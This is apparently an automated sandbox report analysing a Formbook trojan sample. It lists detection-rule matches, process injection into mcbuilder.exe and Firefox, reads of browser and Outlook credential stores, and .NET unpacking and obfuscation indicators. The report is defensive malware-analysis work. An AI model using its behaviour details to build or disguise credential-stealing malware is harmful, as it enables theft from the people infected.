                  Source: dGHiTqj3AB.exe, 00000000.00000000.1637708265.0000000000912000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameamWV.exe8 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1754233413.000000000107E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCAA.dll4 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemcbuilder.exej% vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemcbuilder.exej% vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000019FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exeBinary or memory string: OriginalFilenameamWV.exe8 vs dGHiTqj3AB.exe
                  Source: dGHiTqj3AB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: dGHiTqj3AB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, hNFj00Hv45CTOkfqEI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: dGHiTqj3AB.exe, 00000000.00000002.1754175438.0000000001037000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ational Typeface Corporation.slntQ
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@7/5
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dGHiTqj3AB.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\mcbuilder.exeFile created: C:\Users\user\AppData\Local\Temp\6fI63K3EJump to behavior
                  Source: dGHiTqj3AB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: dGHiTqj3AB.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: mcbuilder.exe, 00000008.00000003.2583851167.00000000033B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE sync_entities_metadata (storage_key INTEGER PRIMARY KEY AUTOINCREMENT, metadata VARCPi;
                  Source: mcbuilder.exe, 00000008.00000002.3492126956.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2583851167.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2595096296.00000000033D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknownProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeProcess created: C:\Windows\SysWOW64\mcbuilder.exe "C:\Windows\SysWOW64\mcbuilder.exe"
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeProcess created: C:\Users\user\Desktop\dGHiTqj3AB.exe "C:\Users\user\Desktop\dGHiTqj3AB.exe"Jump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeProcess created: C:\Windows\SysWOW64\mcbuilder.exe "C:\Windows\SysWOW64\mcbuilder.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: winsqlite3.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\wxIxUfGowGoPLrEBANDUBRahhjmbZDGLAZakqLAhQxivtuelgvzf\fgebfePlJm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mcbuilder.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                  Source: dGHiTqj3AB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: dGHiTqj3AB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: dGHiTqj3AB.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: mcbuilder.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: amWV.pdb source: dGHiTqj3AB.exe
                  Source: Binary string: amWV.pdbSHA256 source: dGHiTqj3AB.exe
                  Source: Binary string: mcbuilder.pdb source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp, fgebfePlJm.exe, 00000007.00000002.3492316310.00000000006D8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fgebfePlJm.exe, 00000007.00000000.2188191018.000000000092E000.00000002.00000001.01000000.0000000C.sdmp, fgebfePlJm.exe, 00000009.00000000.2469561771.000000000092E000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: dGHiTqj3AB.exe, dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, mcbuilder.exe, 00000008.00000003.2272383475.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000003.2264431609.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, mcbuilder.exe, 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  .NET source code contains potential unpacker
                  Source: dGHiTqj3AB.exe, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs.Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
                  Source: 8.2.mcbuilder.exe.3f2cd10.2.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 9.2.fgebfePlJm.exe.296cd10.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 9.0.fgebfePlJm.exe.296cd10.1.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: 11.2.firefox.exe.a7bcd10.0.raw.unpack, Form1.cs.Net Code: InitializeComponent System.AppDomain.Load(byte[])
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_0102F112 pushad ; iretd 0_2_0102F119
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 0_2_01025DF7 push eax; iretd 0_2_01025E21
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418BBD push ds; retf 2ECDh3_2_00418BEE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00401420 push es; retn 00F1h3_2_004014F8
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0041F0DC push es; retf 3_2_0041F0E6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00412104 pushad ; ret 3_2_0041212D
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0040C1EA push edx; retf 3_2_0040C1EE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00403260 push eax; ret 3_2_00403262
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00426263 push edi; iretd 3_2_0042626E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00408271 push es; ret 3_2_00408272
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00413A0B push esi; retf 3_2_00413A0E
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418A13 push ds; retf 2ECDh3_2_00418BEE
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418355 push ebp; retf 3_2_004183DC
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_00418BA5 push ebx; iretd 3_2_00418BA6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0041E653 push ds; iretd 3_2_0041E654
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_0041E63B push ebx; iretd 3_2_0041E64C
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D225F pushad ; ret 3_2_018D27F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D27FA pushad ; ret 3_2_018D27F9
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_019009AD push ecx; mov dword ptr [esp], ecx3_2_019009B6
                  Source: C:\Users\user\Desktop\dGHiTqj3AB.exeCode function: 3_2_018D283D push eax; iretd 3_2_018D2858
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0386225F pushad ; ret 8_2_038627F9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038627FA pushad ; ret 8_2_038627F9
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_038909AD push ecx; mov dword ptr [esp], ecx8_2_038909B6
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0386283D push eax; iretd 8_2_03862858
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03861368 push eax; iretd 8_2_03861369
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030B0280 push edi; retn F913h8_2_030B03A3
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A07A8 push esi; retf 8_2_030A07AB
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_03098F87 push edx; retf 8_2_03098F8B
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_0309EEA1 pushad ; ret 8_2_0309EECA
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030A730F push esp; iretd 8_2_030A7319
                  Source: C:\Windows\SysWOW64\mcbuilder.exeCode function: 8_2_030AB3D8 push ebx; iretd 8_2_030AB3E9
                  Source: dGHiTqj3AB.exeStatic PE information: section name: .text entropy: 7.760978166314589
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.csHigh entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
                  Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, cw37txoRO4X56hm21l.csHigh entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.csHigh entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, QpyfwtBfq1mip1rA69.csHigh entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, iIG0lTjpxEHhOQvkFer.csHigh entropy of concatenated method names: 'HyJFl8i0dF', 'pY9FoalJ2C', 'YXNFZuvCpK', 'gBBFehNV3G', 'os2FJX2BQF', 'Gt8FMW0mEa', 'LaNFg1rS6B', 'ivAFH0j6Bf', 'Eu1FywVVXp', 'g8yF1h9yd0'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, g3uWXYxFNrFgfAVMbg.csHigh entropy of concatenated method names: 'Atr4sn5qik', 'NQG4RKODZr', 'ToString', 'QKX46Y1ZVt', 'uCq4rZKPV7', 'mhX4QeDgMS', 'b794uVdd6H', 'C5V49hb9hr', 'D9h4Ij5Vlm', 'v9a4voyumo'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, SM8r4X8fVbB7QJOWqS.csHigh entropy of concatenated method names: 'qKaZAClxf', 'fDZewjihY', 'EX6MEAvLr', 'jJygcp4d8', 'LIVy1JOiD', 'KkP1NXW1P', 's7FjWIgvkZQ8uOxcA5', 'sGKX7cMUQXquQDk8mW', 'vrTWnplwZWPtXk9fHO', 'c2Hwggjt9'
                  Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, raIl7X21rhHoQ1rmtr.csHigh entropy of concatenated method names: 'WFGw7LwYmy', 'CKZwi91L4Y', 'LOIwt8ZYXo', 'vOjwmA9TeZ', 'qFTwOyngwC', 'D4Dwdlo4jm', 'Next', 'Next', 'Next', 'NextBytes'
